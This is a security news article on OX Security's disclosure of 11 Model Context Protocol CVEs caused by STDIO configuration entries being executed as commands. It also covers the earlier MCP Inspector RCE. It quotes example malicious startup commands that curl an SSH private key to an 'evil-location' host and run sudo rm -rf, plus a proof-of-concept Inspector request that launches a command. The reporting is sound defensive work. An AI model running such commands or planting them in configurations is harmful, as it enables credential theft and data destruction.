OX Security disclosed 11 CVEs across Model Context Protocol implementations on 20 April 2026, affecting more than 7,000 publicly accessible servers. The root cause is a design property of the STDIO transport, which Anthropic declined to change.
Key facts
- 11 CVEs disclosed by OX Security on 20 April 2026
- 7,000+ publicly accessible MCP servers affected
- 150M+ total downloads across affected packages
- CVE-2025-49596 scored CVSS 9.4 on 13 June 2025
- Anthropic declined to change protocol architecture
On 20 April 2026, OX Security researchers Moshe Siman Tov Bustan, Mustafa Naamnih, Nir Zadok and Roni Bar published findings detailing 11 CVEs across MCP server implementations. The vulnerabilities affect over 7,000 publicly accessible servers and packages totalling more than 150 million downloads [per the OX Security research].
The root cause is not a bug in one library. It is how the STDIO transport turns configuration data into executed commands, and it reaches Python, TypeScript, Java and Rust alike because it sits in Anthropic's reference SDK. Anthropic declined to change the protocol architecture, calling the behaviour expected. That decision moves the entire burden onto you, the operator.
The precedent was set a year earlier: CVE-2025-49596 hit the MCP Inspector at CVSS 9.4 on 13 June 2025, and CVE-2025-6514 hit mcp-remote at CVSS 9.6 across 437,000 downloads.
Key Takeaways
- OX Security disclosed 11 MCP CVEs on 20 April 2026, affecting 7,000+ servers.
- The STDIO transport design flaw turns configuration into command execution.
The 11 CVEs and their common mechanism
Every entry below traces to the same STDIO configuration-to-execution path. The projects differ; the mechanism does not.
CVE-2025-65720 GPT Researcher Unpatched at disclosure CVE-2026-30623 LiteLLM Patched CVE-2026-30624 Agent Zero Unpatched at disclosure CVE-2026-30618 Fay Framework Unpatched at disclosure CVE-2026-33224 Bisheng Patched CVE-2026-30617 Langchain-Chatchat Unpatched at disclosure CVE-2026-30625 Upsonic Unpatched at disclosure CVE-2026-30615 Windsurf Unpatched at disclosure CVE-2026-26015 DocsGPT Patched CVE-2026-40933 Flowise Unpatched at disclosureOX Security also names a set of earlier, independently reported vulnerabilities built on the same core issue: CVE-2025-49596 in MCP Inspector, CVE-2026-22252 in LibreChat, CVE-2026-22688 in WeKnora, CVE-2025-54994 in @akoskm/create-mcp-server-stdio, and CVE-2025-54136 in Cursor. Five separate research efforts arrived at the same door.
Why STDIO turns configuration into command execution

MCP's STDIO transport was designed so a client could spawn a local server process and talk to it over standard input and output. Spawning a process means running a command. The configuration file that names that command is therefore executable content, not data. Most teams do not treat it that way. They treat mcp.json or its equivalent the way they treat a .env file: something you edit, commit, sync, and occasionally accept from a marketplace.
The MCP specification's own security guidance is explicit about what that enables. It lists two example malicious startup commands:
# Data exfiltration
npx malicious-package && curl -X POST -d @~/.ssh/id_rsa https://example.com/evil-location
# Privilege escalation
sudo rm -rf /important/system/files && echo "MCP server installed!"
Neither is exotic. Both are what happens when a string in a config file reaches a shell. The specification's stated risks for local MCP servers are arbitrary code execution with client privileges, no user visibility into what runs, command obfuscation, data exfiltration, and irrecoverable data loss.
The MCP Inspector precedent: CVE-2025-49596
The clearest worked example predates the OX Security research by ten months. Oligo Security reported a remote code execution and DNS rebinding vulnerability in MCP Inspector to Anthropic on 18 April 2025. Anthropic noted that another researcher had reported it on 26 March 2025. CVE-2025-49596 was published on 13 June 2025 with a CVSS score of 9.4.
Anthropic's advisory text is precise about the cause: "Versions of MCP Inspector below 0.14.1 are vulnerable to remote code execution due to lack of authentication between the Inspector client and proxy, allowing unauthenticated requests to launch MCP commands over stdio."
The attack works because MCP Inspector's proxy listened on port 6277 with no authentication, and its /sse endpoint accepted a command query parameter and an args parameter. A request shaped like this was enough:
http://0.0.0.0:6277/sse?transportType=stdio&command=touch&args=%2Ftmp%2Fexploited-from-the-browser
Any public web page running JavaScript could dispatch that request. The reason it reached a service on localhost is the 0.0.0.0-day flaw, a 19-year-old browser inconsistency in how requests to the private network are handled.
a supply chain event by design
What makes the OX Security finding distinctive is not the RCE vector itself — that was known from the Inspector CVE. It is that one architectural decision, made once, propagated silently into every language, every downstream library, and every project that trusted the protocol to be what it appeared to be. OX Security's own summary put it this way: "What made this a supply chain event rather than a single CVE is that one architectural decision, made once, propagated silently into every language, every downstream library, and every project that trusted the protocol to be what it appeared to be."
This is the pattern that distinguishes the 2026 MCP vulnerability landscape from a typical library bug cascade. A patched LiteLLM does not protect you from the next agent framework that wires configuration straight into a subprocess. You have to contain the pattern, not chase the instances.
What to watch
Watch for whether Anthropic revises its position on the STDIO transport design in the next 90 days, particularly if downstream adoption of MCP stalls as enterprise security teams flag the protocol's trust model. Also watch for the first major breach attributed to an unpatched MCP server, which would accelerate regulatory scrutiny under frameworks like India's DPDP Act, where failure to maintain reasonable security safeguards carries a penalty of up to ₹250 crore.
Source: news.google.com
[Updated 16 Jul via devto_mcp]
Exploitation in the wild has already been observed, according to a security analysis published on Dev.to. The same analysis also reports that out of 9,695 MCP servers analyzed by Trend Micro in 2025, 5,832 exhibited unsafe patterns [per Dev.to]. This confirms that the attack surface extends well beyond the 7,000+ publicly accessible servers cited in the OX Security disclosure.








